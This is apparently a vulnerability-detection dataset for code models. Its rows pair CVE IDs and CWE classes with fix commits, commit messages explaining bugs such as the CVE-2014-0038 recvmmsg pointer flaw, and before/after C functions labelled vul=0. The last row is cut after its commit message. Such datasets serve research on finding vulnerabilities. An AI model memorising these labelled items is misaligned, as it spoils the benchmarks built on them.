CVE ID
stringlengths
13
43
CVE Page
stringlengths
45
48
CWE ID
stringclasses
90 values
codeLink
stringlengths
46
139
commit_id
stringlengths
6
81
commit_message
stringlengths
3
13.3k
func_after
stringlengths
14
241k
func_before
stringlengths
14
241k
lang
stringclasses
3 values
project
stringclasses
309 values
vul
int8
0
1
CVE-2017-18222
https://www.cvedetails.com/cve/CVE-2017-18222/
CWE-119
https://github.com/torvalds/linux/commit/412b65d15a7f8a93794653968308fc100f2aa87c
412b65d15a7f8a93794653968308fc100f2aa87c
net: hns: fix ethtool_get_strings overflow in hns driver hns_get_sset_count() returns HNS_NET_STATS_CNT and the data space allocated is not enough for ethtool_get_strings(), which will cause random memory corruption. When SLAB and DEBUG_SLAB are both enabled, memory corruptions like the the following can be observed without this patch: [ 43.115200] Slab corruption (Not tainted): Acpi-ParseExt start=ffff801fb0b69030, len=80 [ 43.115206] Redzone: 0x9f911029d006462/0x5f78745f31657070. [ 43.115208] Last user: [<5f7272655f746b70>](0x5f7272655f746b70) [ 43.115214] 010: 70 70 65 31 5f 74 78 5f 70 6b 74 00 6b 6b 6b 6b ppe1_tx_pkt.kkkk [ 43.115217] 030: 70 70 65 31 5f 74 78 5f 70 6b 74 5f 6f 6b 00 6b ppe1_tx_pkt_ok.k [ 43.115218] Next obj: start=ffff801fb0b69098, len=80 [ 43.115220] Redzone: 0x706d655f6f666966/0x9f911029d74e35b. [ 43.115229] Last user: [<ffff0000084b11b0>](acpi_os_release_object+0x28/0x38) [ 43.115231] 000: 74 79 00 6b 6b 6b 6b 6b 70 70 65 31 5f 74 78 5f ty.kkkkkppe1_tx_ [ 43.115232] 010: 70 6b 74 5f 65 72 72 5f 63 73 75 6d 5f 66 61 69 pkt_err_csum_fai Signed-off-by: Timmy Li <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void hns_rcb_get_common_regs(struct rcb_common_cb *rcb_com, void *data) { u32 *regs = data; bool is_ver1 = AE_IS_VER1(rcb_com->dsaf_dev->dsaf_ver); bool is_dbg = HNS_DSAF_IS_DEBUG(rcb_com->dsaf_dev); u32 reg_tmp; u32 reg_num_tmp; u32 i = 0; /*rcb common registers */ regs[0] = dsaf_read_dev(rcb_com, RCB_COM_CFG_ENDIAN_REG); regs[1] = dsaf_read_dev(rcb_com, RCB_COM_CFG_SYS_FSH_REG); regs[2] = dsaf_read_dev(rcb_com, RCB_COM_CFG_INIT_FLAG_REG); regs[3] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_REG); regs[4] = dsaf_read_dev(rcb_com, RCB_COM_CFG_RINVLD_REG); regs[5] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FNA_REG); regs[6] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FA_REG); regs[7] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_TC_BP_REG); regs[8] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PPE_TNL_CLKEN_REG); regs[9] = dsaf_read_dev(rcb_com, RCB_COM_INTMSK_TX_PKT_REG); regs[10] = dsaf_read_dev(rcb_com, RCB_COM_RINT_TX_PKT_REG); regs[11] = dsaf_read_dev(rcb_com, RCB_COM_INTMASK_ECC_ERR_REG); regs[12] = dsaf_read_dev(rcb_com, RCB_COM_INTSTS_ECC_ERR_REG); regs[13] = dsaf_read_dev(rcb_com, RCB_COM_EBD_SRAM_ERR_REG); regs[14] = dsaf_read_dev(rcb_com, RCB_COM_RXRING_ERR_REG); regs[15] = dsaf_read_dev(rcb_com, RCB_COM_TXRING_ERR_REG); regs[16] = dsaf_read_dev(rcb_com, RCB_COM_TX_FBD_ERR_REG); regs[17] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK_EN_REG); regs[18] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK0_REG); regs[19] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK1_REG); regs[20] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK2_REG); regs[21] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK3_REG); regs[22] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK4_REG); regs[23] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK5_REG); regs[24] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR0_REG); regs[25] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR3_REG); regs[26] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR4_REG); regs[27] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR5_REG); regs[28] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_RING); regs[29] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING_STS); regs[30] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING); regs[31] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_BD); regs[32] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_BD_RINT_STS); regs[33] = dsaf_read_dev(rcb_com, RCB_COM_RCB_RD_BD_BUSY); regs[34] = dsaf_read_dev(rcb_com, RCB_COM_RCB_FBD_CRT_EN); regs[35] = dsaf_read_dev(rcb_com, RCB_COM_AXI_WR_ERR_INTMASK); regs[36] = dsaf_read_dev(rcb_com, RCB_COM_AXI_ERR_STS); regs[37] = dsaf_read_dev(rcb_com, RCB_COM_CHK_TX_FBD_NUM_REG); /* rcb common entry registers */ for (i = 0; i < 16; i++) { /* total 16 model registers */ regs[38 + i] = dsaf_read_dev(rcb_com, RCB_CFG_BD_NUM_REG + 4 * i); regs[54 + i] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_REG + 4 * i); } reg_tmp = is_ver1 ? RCB_CFG_OVERTIME_REG : RCB_PORT_CFG_OVERTIME_REG; reg_num_tmp = (is_ver1 || is_dbg) ? 1 : 6; for (i = 0; i < reg_num_tmp; i++) regs[70 + i] = dsaf_read_dev(rcb_com, reg_tmp); regs[76] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_INT_NUM_REG); regs[77] = dsaf_read_dev(rcb_com, RCB_CFG_OVERTIME_INT_NUM_REG); /* mark end of rcb common regs */ for (i = 78; i < 80; i++) regs[i] = 0xcccccccc; }
void hns_rcb_get_common_regs(struct rcb_common_cb *rcb_com, void *data) { u32 *regs = data; bool is_ver1 = AE_IS_VER1(rcb_com->dsaf_dev->dsaf_ver); bool is_dbg = HNS_DSAF_IS_DEBUG(rcb_com->dsaf_dev); u32 reg_tmp; u32 reg_num_tmp; u32 i = 0; /*rcb common registers */ regs[0] = dsaf_read_dev(rcb_com, RCB_COM_CFG_ENDIAN_REG); regs[1] = dsaf_read_dev(rcb_com, RCB_COM_CFG_SYS_FSH_REG); regs[2] = dsaf_read_dev(rcb_com, RCB_COM_CFG_INIT_FLAG_REG); regs[3] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_REG); regs[4] = dsaf_read_dev(rcb_com, RCB_COM_CFG_RINVLD_REG); regs[5] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FNA_REG); regs[6] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FA_REG); regs[7] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_TC_BP_REG); regs[8] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PPE_TNL_CLKEN_REG); regs[9] = dsaf_read_dev(rcb_com, RCB_COM_INTMSK_TX_PKT_REG); regs[10] = dsaf_read_dev(rcb_com, RCB_COM_RINT_TX_PKT_REG); regs[11] = dsaf_read_dev(rcb_com, RCB_COM_INTMASK_ECC_ERR_REG); regs[12] = dsaf_read_dev(rcb_com, RCB_COM_INTSTS_ECC_ERR_REG); regs[13] = dsaf_read_dev(rcb_com, RCB_COM_EBD_SRAM_ERR_REG); regs[14] = dsaf_read_dev(rcb_com, RCB_COM_RXRING_ERR_REG); regs[15] = dsaf_read_dev(rcb_com, RCB_COM_TXRING_ERR_REG); regs[16] = dsaf_read_dev(rcb_com, RCB_COM_TX_FBD_ERR_REG); regs[17] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK_EN_REG); regs[18] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK0_REG); regs[19] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK1_REG); regs[20] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK2_REG); regs[21] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK3_REG); regs[22] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK4_REG); regs[23] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK5_REG); regs[24] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR0_REG); regs[25] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR3_REG); regs[26] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR4_REG); regs[27] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR5_REG); regs[28] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_RING); regs[29] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING_STS); regs[30] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING); regs[31] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_BD); regs[32] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_BD_RINT_STS); regs[33] = dsaf_read_dev(rcb_com, RCB_COM_RCB_RD_BD_BUSY); regs[34] = dsaf_read_dev(rcb_com, RCB_COM_RCB_FBD_CRT_EN); regs[35] = dsaf_read_dev(rcb_com, RCB_COM_AXI_WR_ERR_INTMASK); regs[36] = dsaf_read_dev(rcb_com, RCB_COM_AXI_ERR_STS); regs[37] = dsaf_read_dev(rcb_com, RCB_COM_CHK_TX_FBD_NUM_REG); /* rcb common entry registers */ for (i = 0; i < 16; i++) { /* total 16 model registers */ regs[38 + i] = dsaf_read_dev(rcb_com, RCB_CFG_BD_NUM_REG + 4 * i); regs[54 + i] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_REG + 4 * i); } reg_tmp = is_ver1 ? RCB_CFG_OVERTIME_REG : RCB_PORT_CFG_OVERTIME_REG; reg_num_tmp = (is_ver1 || is_dbg) ? 1 : 6; for (i = 0; i < reg_num_tmp; i++) regs[70 + i] = dsaf_read_dev(rcb_com, reg_tmp); regs[76] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_INT_NUM_REG); regs[77] = dsaf_read_dev(rcb_com, RCB_CFG_OVERTIME_INT_NUM_REG); /* mark end of rcb common regs */ for (i = 78; i < 80; i++) regs[i] = 0xcccccccc; }
C
linux
0
CVE-2011-3102
https://www.cvedetails.com/cve/CVE-2011-3102/
CWE-189
https://github.com/chromium/chromium/commit/4c46d7a5b0af9b7d320e709291b270ab7cf07e83
4c46d7a5b0af9b7d320e709291b270ab7cf07e83
Fix XPointer bug. BUG=125462 [email protected] [email protected] Review URL: https://chromiumcodereview.appspot.com/10344022 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@135174 0039d316-1c4b-4281-b951-d872f2087c98
xmlXPtrStartPointFunction(xmlXPathParserContextPtr ctxt, int nargs) { xmlXPathObjectPtr tmp, obj, point; xmlLocationSetPtr newset = NULL; xmlLocationSetPtr oldset = NULL; CHECK_ARITY(1); if ((ctxt->value == NULL) || ((ctxt->value->type != XPATH_LOCATIONSET) && (ctxt->value->type != XPATH_NODESET))) XP_ERROR(XPATH_INVALID_TYPE) obj = valuePop(ctxt); if (obj->type == XPATH_NODESET) { /* * First convert to a location set */ tmp = xmlXPtrNewLocationSetNodeSet(obj->nodesetval); xmlXPathFreeObject(obj); obj = tmp; } newset = xmlXPtrLocationSetCreate(NULL); if (newset == NULL) { xmlXPathFreeObject(obj); XP_ERROR(XPATH_MEMORY_ERROR); } oldset = (xmlLocationSetPtr) obj->user; if (oldset != NULL) { int i; for (i = 0; i < oldset->locNr; i++) { tmp = oldset->locTab[i]; if (tmp == NULL) continue; point = NULL; switch (tmp->type) { case XPATH_POINT: point = xmlXPtrNewPoint(tmp->user, tmp->index); break; case XPATH_RANGE: { xmlNodePtr node = tmp->user; if (node != NULL) { if (node->type == XML_ATTRIBUTE_NODE) { /* TODO: Namespace Nodes ??? */ xmlXPathFreeObject(obj); xmlXPtrFreeLocationSet(newset); XP_ERROR(XPTR_SYNTAX_ERROR); } point = xmlXPtrNewPoint(node, tmp->index); } break; } default: /*** Should we raise an error ? xmlXPathFreeObject(obj); xmlXPathFreeObject(newset); XP_ERROR(XPATH_INVALID_TYPE) ***/ break; } if (point != NULL) xmlXPtrLocationSetAdd(newset, point); } } xmlXPathFreeObject(obj); valuePush(ctxt, xmlXPtrWrapLocationSet(newset)); }
xmlXPtrStartPointFunction(xmlXPathParserContextPtr ctxt, int nargs) { xmlXPathObjectPtr tmp, obj, point; xmlLocationSetPtr newset = NULL; xmlLocationSetPtr oldset = NULL; CHECK_ARITY(1); if ((ctxt->value == NULL) || ((ctxt->value->type != XPATH_LOCATIONSET) && (ctxt->value->type != XPATH_NODESET))) XP_ERROR(XPATH_INVALID_TYPE) obj = valuePop(ctxt); if (obj->type == XPATH_NODESET) { /* * First convert to a location set */ tmp = xmlXPtrNewLocationSetNodeSet(obj->nodesetval); xmlXPathFreeObject(obj); obj = tmp; } newset = xmlXPtrLocationSetCreate(NULL); if (newset == NULL) { xmlXPathFreeObject(obj); XP_ERROR(XPATH_MEMORY_ERROR); } oldset = (xmlLocationSetPtr) obj->user; if (oldset != NULL) { int i; for (i = 0; i < oldset->locNr; i++) { tmp = oldset->locTab[i]; if (tmp == NULL) continue; point = NULL; switch (tmp->type) { case XPATH_POINT: point = xmlXPtrNewPoint(tmp->user, tmp->index); break; case XPATH_RANGE: { xmlNodePtr node = tmp->user; if (node != NULL) { if (node->type == XML_ATTRIBUTE_NODE) { /* TODO: Namespace Nodes ??? */ xmlXPathFreeObject(obj); xmlXPtrFreeLocationSet(newset); XP_ERROR(XPTR_SYNTAX_ERROR); } point = xmlXPtrNewPoint(node, tmp->index); } break; } default: /*** Should we raise an error ? xmlXPathFreeObject(obj); xmlXPathFreeObject(newset); XP_ERROR(XPATH_INVALID_TYPE) ***/ break; } if (point != NULL) xmlXPtrLocationSetAdd(newset, point); } } xmlXPathFreeObject(obj); valuePush(ctxt, xmlXPtrWrapLocationSet(newset)); }
C
Chrome
0
CVE-2014-0038
https://www.cvedetails.com/cve/CVE-2014-0038/
CWE-20
https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268
2def2ef2ae5f3990aabdbe8a755911902707d268
x86, x32: Correct invalid use of user timespec in the kernel The x32 case for the recvmsg() timout handling is broken: asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct compat_timespec __user *timeout) { int datagrams; struct timespec ktspec; if (flags & MSG_CMSG_COMPAT) return -EINVAL; if (COMPAT_USE_64BIT_TIME) return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, (struct timespec *) timeout); ... The timeout pointer parameter is provided by userland (hence the __user annotation) but for x32 syscalls it's simply cast to a kernel pointer and is passed to __sys_recvmmsg which will eventually directly dereference it for both reading and writing. Other callers to __sys_recvmmsg properly copy from userland to the kernel first. The bug was introduced by commit ee4fa23c4bfc ("compat: Use COMPAT_USE_64BIT_TIME in net/compat.c") and should affect all kernels since 3.4 (and perhaps vendor kernels if they backported x32 support along with this code). Note that CONFIG_X86_X32_ABI gets enabled at build time and only if CONFIG_X86_X32 is enabled and ld can build x32 executables. Other uses of COMPAT_USE_64BIT_TIME seem fine. This addresses CVE-2014-0038. Signed-off-by: PaX Team <[email protected]> Signed-off-by: H. Peter Anvin <[email protected]> Cc: <[email protected]> # v3.4+ Signed-off-by: Linus Torvalds <[email protected]>
static int do_set_sock_timeout(struct socket *sock, int level, int optname, char __user *optval, unsigned int optlen) { struct compat_timeval __user *up = (struct compat_timeval __user *)optval; struct timeval ktime; mm_segment_t old_fs; int err; if (optlen < sizeof(*up)) return -EINVAL; if (!access_ok(VERIFY_READ, up, sizeof(*up)) || __get_user(ktime.tv_sec, &up->tv_sec) || __get_user(ktime.tv_usec, &up->tv_usec)) return -EFAULT; old_fs = get_fs(); set_fs(KERNEL_DS); err = sock_setsockopt(sock, level, optname, (char *)&ktime, sizeof(ktime)); set_fs(old_fs); return err; }
static int do_set_sock_timeout(struct socket *sock, int level, int optname, char __user *optval, unsigned int optlen) { struct compat_timeval __user *up = (struct compat_timeval __user *)optval; struct timeval ktime; mm_segment_t old_fs; int err; if (optlen < sizeof(*up)) return -EINVAL; if (!access_ok(VERIFY_READ, up, sizeof(*up)) || __get_user(ktime.tv_sec, &up->tv_sec) || __get_user(ktime.tv_usec, &up->tv_usec)) return -EFAULT; old_fs = get_fs(); set_fs(KERNEL_DS); err = sock_setsockopt(sock, level, optname, (char *)&ktime, sizeof(ktime)); set_fs(old_fs); return err; }
C
linux
0
CVE-2014-3610
https://www.cvedetails.com/cve/CVE-2014-3610/
CWE-264
https://github.com/torvalds/linux/commit/854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
KVM: x86: Check non-canonical addresses upon WRMSR Upon WRMSR, the CPU should inject #GP if a non-canonical value (address) is written to certain MSRs. The behavior is "almost" identical for AMD and Intel (ignoring MSRs that are not implemented in either architecture since they would anyhow #GP). However, IA32_SYSENTER_ESP and IA32_SYSENTER_EIP cause #GP if non-canonical address is written on Intel but not on AMD (which ignores the top 32-bits). Accordingly, this patch injects a #GP on the MSRs which behave identically on Intel and AMD. To eliminate the differences between the architecutres, the value which is written to IA32_SYSENTER_ESP and IA32_SYSENTER_EIP is turned to canonical value before writing instead of injecting a #GP. Some references from Intel and AMD manuals: According to Intel SDM description of WRMSR instruction #GP is expected on WRMSR "If the source register contains a non-canonical address and ECX specifies one of the following MSRs: IA32_DS_AREA, IA32_FS_BASE, IA32_GS_BASE, IA32_KERNEL_GS_BASE, IA32_LSTAR, IA32_SYSENTER_EIP, IA32_SYSENTER_ESP." According to AMD manual instruction manual: LSTAR/CSTAR (SYSCALL): "The WRMSR instruction loads the target RIP into the LSTAR and CSTAR registers. If an RIP written by WRMSR is not in canonical form, a general-protection exception (#GP) occurs." IA32_GS_BASE and IA32_FS_BASE (WRFSBASE/WRGSBASE): "The address written to the base field must be in canonical form or a #GP fault will occur." IA32_KERNEL_GS_BASE (SWAPGS): "The address stored in the KernelGSbase MSR must be in canonical form." This patch fixes CVE-2014-3610. Cc: [email protected] Signed-off-by: Nadav Amit <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static inline void sync_lapic_to_cr8(struct kvm_vcpu *vcpu) { struct vcpu_svm *svm = to_svm(vcpu); u64 cr8; if (is_guest_mode(vcpu) && (vcpu->arch.hflags & HF_VINTR_MASK)) return; cr8 = kvm_get_cr8(vcpu); svm->vmcb->control.int_ctl &= ~V_TPR_MASK; svm->vmcb->control.int_ctl |= cr8 & V_TPR_MASK; }
static inline void sync_lapic_to_cr8(struct kvm_vcpu *vcpu) { struct vcpu_svm *svm = to_svm(vcpu); u64 cr8; if (is_guest_mode(vcpu) && (vcpu->arch.hflags & HF_VINTR_MASK)) return; cr8 = kvm_get_cr8(vcpu); svm->vmcb->control.int_ctl &= ~V_TPR_MASK; svm->vmcb->control.int_ctl |= cr8 & V_TPR_MASK; }
C
linux
0
null
null
null
https://github.com/chromium/chromium/commit/c10688623b331e0c72c502b718cff5016de61f85
c10688623b331e0c72c502b718cff5016de61f85
Don't force callers to be ASCII (when some of them already aren't). TBR=tfarina BUG=none TEST=none Review URL: http://codereview.chromium.org/3137015 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@56451 0039d316-1c4b-4281-b951-d872f2087c98
bool Environment::HasVar(const char* variable_name) { return GetVar(variable_name, NULL); }
bool Environment::HasVar(const char* variable_name) { return GetVar(variable_name, NULL); }
C
Chrome
0
CVE-2012-6712
https://www.cvedetails.com/cve/CVE-2012-6712/
CWE-119
https://github.com/torvalds/linux/commit/2da424b0773cea3db47e1e81db71eeebde8269d4
2da424b0773cea3db47e1e81db71eeebde8269d4
iwlwifi: Sanity check for sta_id On my testing, I saw some strange behavior [ 421.739708] iwlwifi 0000:01:00.0: ACTIVATE a non DRIVER active station id 148 addr 00:00:00:00:00:00 [ 421.739719] iwlwifi 0000:01:00.0: iwl_sta_ucode_activate Added STA id 148 addr 00:00:00:00:00:00 to uCode not sure how it happen, but adding the sanity check to prevent memory corruption Signed-off-by: Wey-Yi Guy <[email protected]> Signed-off-by: John W. Linville <[email protected]>
int iwlagn_add_bssid_station(struct iwl_priv *priv, struct iwl_rxon_context *ctx, const u8 *addr, u8 *sta_id_r) { int ret; u8 sta_id; struct iwl_link_quality_cmd *link_cmd; unsigned long flags; if (sta_id_r) *sta_id_r = IWL_INVALID_STATION; ret = iwl_add_station_common(priv, ctx, addr, 0, NULL, &sta_id); if (ret) { IWL_ERR(priv, "Unable to add station %pM\n", addr); return ret; } if (sta_id_r) *sta_id_r = sta_id; spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].used |= IWL_STA_LOCAL; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); /* Set up default rate scaling table in device's station table */ link_cmd = iwl_sta_alloc_lq(priv, ctx, sta_id); if (!link_cmd) { IWL_ERR(priv, "Unable to initialize rate scaling for station %pM.\n", addr); return -ENOMEM; } ret = iwl_send_lq_cmd(priv, ctx, link_cmd, CMD_SYNC, true); if (ret) IWL_ERR(priv, "Link quality command failed (%d)\n", ret); spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].lq = link_cmd; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); return 0; }
int iwlagn_add_bssid_station(struct iwl_priv *priv, struct iwl_rxon_context *ctx, const u8 *addr, u8 *sta_id_r) { int ret; u8 sta_id; struct iwl_link_quality_cmd *link_cmd; unsigned long flags; if (sta_id_r) *sta_id_r = IWL_INVALID_STATION; ret = iwl_add_station_common(priv, ctx, addr, 0, NULL, &sta_id); if (ret) { IWL_ERR(priv, "Unable to add station %pM\n", addr); return ret; } if (sta_id_r) *sta_id_r = sta_id; spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].used |= IWL_STA_LOCAL; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); /* Set up default rate scaling table in device's station table */ link_cmd = iwl_sta_alloc_lq(priv, ctx, sta_id); if (!link_cmd) { IWL_ERR(priv, "Unable to initialize rate scaling for station %pM.\n", addr); return -ENOMEM; } ret = iwl_send_lq_cmd(priv, ctx, link_cmd, CMD_SYNC, true); if (ret) IWL_ERR(priv, "Link quality command failed (%d)\n", ret); spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].lq = link_cmd; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); return 0; }
C
linux
0
CVE-2014-3171
https://www.cvedetails.com/cve/CVE-2014-3171/
null
https://github.com/chromium/chromium/commit/d10a8dac48d3a9467e81c62cb45208344f4542db
d10a8dac48d3a9467e81c62cb45208344f4542db
Replace further questionable HashMap::add usages in bindings BUG=390928 [email protected] Review URL: https://codereview.chromium.org/411273002 git-svn-id: svn://svn.chromium.org/blink/trunk@178823 bbb929c8-8fbe-4397-9dbb-9b2b20218538
String errorMessage() { return m_errorMessage; }
String errorMessage() { return m_errorMessage; }
C
Chrome
0
CVE-2017-5061
https://www.cvedetails.com/cve/CVE-2017-5061/
CWE-362
https://github.com/chromium/chromium/commit/5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34
5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34
(Reland) Discard compositor frames from unloaded web content This is a reland of https://codereview.chromium.org/2707243005/ with a small change to fix an uninitialized memory error that fails on MSAN bots. BUG=672847 [email protected], [email protected] CQ_INCLUDE_TRYBOTS=master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_site_isolation Review-Url: https://codereview.chromium.org/2731283003 Cr-Commit-Position: refs/heads/master@{#454954}
LayerTreeHostTestSetNeedsRedraw() : num_commits_(0), num_draws_(0) {}
LayerTreeHostTestSetNeedsRedraw() : num_commits_(0), num_draws_(0) {}
C
Chrome
0
CVE-2017-16359
https://www.cvedetails.com/cve/CVE-2017-16359/
CWE-476
https://github.com/radare/radare2/commit/62e39f34b2705131a2d08aff0c2e542c6a52cf0e
62e39f34b2705131a2d08aff0c2e542c6a52cf0e
Fix #8764 - huge vd_aux caused pointer wraparound
static int read_reloc(ELFOBJ *bin, RBinElfReloc *r, int is_rela, ut64 offset) { ut8 *buf = bin->b->buf; int j = 0; if (offset + sizeof (Elf_ (Rela)) > bin->size || offset + sizeof (Elf_(Rela)) < offset) { return -1; } if (is_rela == DT_RELA) { Elf_(Rela) rela; #if R_BIN_ELF64 rela.r_offset = READ64 (buf + offset, j) rela.r_info = READ64 (buf + offset, j) rela.r_addend = READ64 (buf + offset, j) #else rela.r_offset = READ32 (buf + offset, j) rela.r_info = READ32 (buf + offset, j) rela.r_addend = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rela.r_offset; r->type = ELF_R_TYPE (rela.r_info); r->sym = ELF_R_SYM (rela.r_info); r->last = 0; r->addend = rela.r_addend; return sizeof (Elf_(Rela)); } else { Elf_(Rel) rel; #if R_BIN_ELF64 rel.r_offset = READ64 (buf + offset, j) rel.r_info = READ64 (buf + offset, j) #else rel.r_offset = READ32 (buf + offset, j) rel.r_info = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rel.r_offset; r->type = ELF_R_TYPE (rel.r_info); r->sym = ELF_R_SYM (rel.r_info); r->last = 0; return sizeof (Elf_(Rel)); } }
static int read_reloc(ELFOBJ *bin, RBinElfReloc *r, int is_rela, ut64 offset) { ut8 *buf = bin->b->buf; int j = 0; if (offset + sizeof (Elf_ (Rela)) > bin->size || offset + sizeof (Elf_(Rela)) < offset) { return -1; } if (is_rela == DT_RELA) { Elf_(Rela) rela; #if R_BIN_ELF64 rela.r_offset = READ64 (buf + offset, j) rela.r_info = READ64 (buf + offset, j) rela.r_addend = READ64 (buf + offset, j) #else rela.r_offset = READ32 (buf + offset, j) rela.r_info = READ32 (buf + offset, j) rela.r_addend = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rela.r_offset; r->type = ELF_R_TYPE (rela.r_info); r->sym = ELF_R_SYM (rela.r_info); r->last = 0; r->addend = rela.r_addend; return sizeof (Elf_(Rela)); } else { Elf_(Rel) rel; #if R_BIN_ELF64 rel.r_offset = READ64 (buf + offset, j) rel.r_info = READ64 (buf + offset, j) #else rel.r_offset = READ32 (buf + offset, j) rel.r_info = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rel.r_offset; r->type = ELF_R_TYPE (rel.r_info); r->sym = ELF_R_SYM (rel.r_info); r->last = 0; return sizeof (Elf_(Rel)); } }
C
radare2
0
CVE-2016-1640
https://www.cvedetails.com/cve/CVE-2016-1640/
CWE-17
https://github.com/chromium/chromium/commit/0a1c15fecb1240ab909e1431b6127410c3b380e0
0a1c15fecb1240ab909e1431b6127410c3b380e0
Make the webstore inline install dialog be tab-modal Also clean up a few minor lint errors while I'm in here. BUG=550047 Review URL: https://codereview.chromium.org/1496033003 Cr-Commit-Position: refs/heads/master@{#363925}
void ExpandableContainerView::DetailsView::AnimateToState(double state) { state_ = state; PreferredSizeChanged(); SchedulePaint(); }
void ExpandableContainerView::DetailsView::AnimateToState(double state) { state_ = state; PreferredSizeChanged(); SchedulePaint(); }
C
Chrome
0
CVE-2017-6310
https://www.cvedetails.com/cve/CVE-2017-6310/
CWE-125
https://github.com/verdammelt/tnef/commit/8dccf79857ceeb7a6d3e42c1e762e7b865d5344d
8dccf79857ceeb7a6d3e42c1e762e7b865d5344d
Check types to avoid invalid reads/writes.
confirm_action (const char *prompt, ...) { if (INTERACTIVE) { int confirmed = 0; char buf[BUFSIZ + 1]; va_list args; va_start (args, prompt); VPRINTF(stdout, prompt, args); fgets (buf, BUFSIZ, stdin); if (buf[0] == 'y' || buf[0] == 'Y') confirmed = 1; va_end (args); return confirmed; } return 1; }
confirm_action (const char *prompt, ...) { if (INTERACTIVE) { int confirmed = 0; char buf[BUFSIZ + 1]; va_list args; va_start (args, prompt); VPRINTF(stdout, prompt, args); fgets (buf, BUFSIZ, stdin); if (buf[0] == 'y' || buf[0] == 'Y') confirmed = 1; va_end (args); return confirmed; } return 1; }
C
tnef
0
CVE-2015-5707
https://www.cvedetails.com/cve/CVE-2015-5707/
CWE-189
https://github.com/torvalds/linux/commit/451a2886b6bf90e2fb378f7c46c655450fb96e81
451a2886b6bf90e2fb378f7c46c655450fb96e81
sg_start_req(): make sure that there's not too many elements in iovec unfortunately, allowing an arbitrary 16bit value means a possibility of overflow in the calculation of total number of pages in bio_map_user_iov() - we rely on there being no more than PAGE_SIZE members of sum in the first loop there. If that sum wraps around, we end up allocating too small array of pointers to pages and it's easy to overflow it in the second loop. X-Coverup: TINC (and there's no lumber cartel either) Cc: [email protected] # way, way back Signed-off-by: Al Viro <[email protected]>
